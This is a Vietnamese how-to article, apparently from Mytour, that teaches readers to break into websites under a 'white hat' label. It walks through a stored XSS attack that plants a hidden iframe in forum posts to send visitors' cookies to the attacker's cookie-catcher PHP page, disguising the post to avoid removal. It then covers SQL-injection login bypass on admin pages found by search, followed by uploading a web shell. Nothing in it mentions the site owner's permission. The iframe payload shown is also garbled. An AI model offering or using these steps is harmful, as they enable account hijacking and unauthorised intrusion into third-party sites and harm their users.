Cách Đột Nhập vào một Trang Web

Một giới thiệu nhanh về cách đột nhập vào một trang webMột số người cho rằng tất cả các hacker đều có ý đồ xấu, nhưng điều đó không đúng! Hacker 'mũ trắng' tận dụng các lỗ hổng trong các trang web để giúp chủ sở hữu của trang cải thiện bảo mật của họ. Hacking mũ trắng có thể trở thành nghề nghiệp của bạn! Bài viết của Mytour này sẽ chỉ cho bạn hai cách để đột nhập vào các trang web như một hacker mũ trắng, cung cấp cho bạn một số mã mẫu và giúp bạn hoàn thiện kỹ năng hacking của mình.

Tìm một trang web dễ bị tấn công nơi bạn có thể đăng nội dung. Một diễn đàn là một ví dụ tốt. Hãy nhớ, nếu trang web không dễ bị tấn công bởi kịch bản chéo trang, thì phương pháp này sẽ không hoạt động.

Đi tới để tạo một bài đăng. Bạn sẽ cần phải gõ một số mã đặc biệt vào 'bài đăng' để nắm bắt dữ liệu của tất cả những người nhấp vào nó.

• Bạn sẽ muốn thử nghiệm xem hệ thống có lọc mã hay không. Đăng bài

  <script>window.alert('test')</script>

  Nếu hộp cảnh báo xuất hiện khi bạn nhấp vào bài đăng của mình, thì trang web có lỗ hổng để tấn công.

Tạo và tải lên bộ bắt cookie của bạn. Mục tiêu của cuộc tấn công này là nắm bắt cookie của người dùng, cho phép bạn truy cập vào tài khoản của họ đối với các trang web có đăng nhập dễ bị tấn công. Bạn sẽ cần một bộ bắt cookie, sẽ nắm bắt được cookie của mục tiêu của bạn và chuyển hướng chúng. Tải lên bộ bắt vào một trang web mà bạn có quyền truy cập và hỗ trợ PHP và dễ bị tấn công từ xa thông qua việc tải lên. Một mã bắt cookie mẫu có thể được tìm thấy trong phần mẫu.

Đăng bài với bộ bắt cookie của bạn. Nhập một mã đúng vào bài đăng sẽ nắm bắt cookie và gửi chúng đến trang web của bạn. Bạn sẽ muốn đặt vào một số văn bản sau mã để giảm độ nghi ngờ và giữ cho bài đăng của bạn không bị xóa.

• Mã mẫu sẽ trông giống như
  <iframe frameborder='0' height='0' width='0' src='javascript...:void(document.location='YOURURL/cookie catcher.PHP?c=' document.cookie)></iframe>

Sử dụng cookie đã thu thập được. Sau đó, bạn có thể sử dụng thông tin cookie, mà nên được lưu trên trang web của bạn, cho bất kỳ mục đích nào bạn cần.

Tìm một trang web dễ bị tấn công. Bạn sẽ cần phải tìm một trang web dễ bị tấn công, do việc đăng nhập quản trị dễ dàng truy cập được. Hãy thử tìm kiếm trên công cụ tìm kiếm yêu thích của bạn để đăng nhập quản trị. asp hoặc admin login.php.

Đăng nhập dưới tư cách là một quản trị viên. Nhập admin là tên người dùng và sử dụng một trong vài chuỗi khác nhau làm mật khẩu. Đây có thể là bất kỳ một trong vài chuỗi khác nhau nhưng một ví dụ phổ biến là 1'or'1'='1 hoặc 2'='2.

Hãy kiên nhẫn. Điều này có lẽ sẽ đòi hỏi một chút thử và sai.

Truy cập vào trang web. Cuối cùng, bạn nên có thể tìm thấy một chuỗi cho phép bạn truy cập quản trị vào một trang web, miễn là trang web dễ bị tấn công. Sau đó, khi đăng nhập với tư cách là một quản trị viên, bạn có thể thực hiện các hành động tiếp theo, như tải lên một cái vỏ web để có quyền truy cập phía máy chủ nếu bạn có thể thực hiện tải tệp lên.

Học một ngôn ngữ lập trình hoặc hai. Nếu bạn muốn học cách đột nhập vào các trang web, bạn sẽ cần hiểu biết về cách hoạt động của máy tính và các công nghệ khác. Hãy học sử dụng các ngôn ngữ lập trình như Python, PHP (cần thiết để khai thác các lỗ hổng phía máy chủ), hoặc SQL, để bạn có thể kiểm soát máy tính tốt hơn và xác định lỗ hổng trong hệ thống.

Có kiến thức cơ bản về HTML. Bạn cũng cần phải có hiểu biết tốt về HTML và JavaScript nếu bạn muốn đột nhập vào các trang web cụ thể. Điều này có thể mất thời gian để học nhưng có rất nhiều cách miễn phí để học trên internet, vì vậy bạn nhất định sẽ có cơ hội nếu bạn muốn.

Tư vấn với các hacker mũ trắng. Hacker mũ trắng là những hacker sử dụng sức mạnh của họ vì điều tốt lành, tiết lộ lỗ hổng bảo mật và làm cho internet trở nên tốt đẹp hơn cho mọi người. Nếu bạn muốn học cách đột nhập và sử dụng sức mạnh của mình vì điều tốt lành hoặc nếu bạn muốn giúp bảo vệ trang web của mình, bạn có thể muốn liên hệ với một số hacker mũ trắng hiện tại để nhận được lời khuyên.

Nghiên cứu về hacking. Nếu bạn muốn học đột nhập hoặc nếu bạn chỉ muốn tự bảo vệ bản thân, bạn sẽ cần phải nghiên cứu rất nhiều. Có rất nhiều cách khác nhau mà các trang web có thể dễ bị tấn công và danh sách này luôn thay đổi, vì vậy bạn sẽ cần phải liên tục học hỏi.

Cập nhật thông tin. Vì danh sách các cuộc tấn công có thể thay đổi, và các lỗ hổng mới được phát hiện, bạn cần phải đảm bảo bạn cập nhật thông tin. Chỉ vì bạn được bảo vệ khỏi một loại tấn công cụ thể ngay bây giờ không có nghĩa là bạn sẽ an toàn trong tương lai!

• Đi tới các diễn đàn hacker để nhận được nhiều mẹo hữu ích.
• Hướng dẫn này chỉ dành cho mục đích giáo dục, hoặc để giúp mọi người bắt đầu học hacking mũ trắng hoặc để xem cách hacker làm việc để bảo vệ trang web của họ tốt hơn.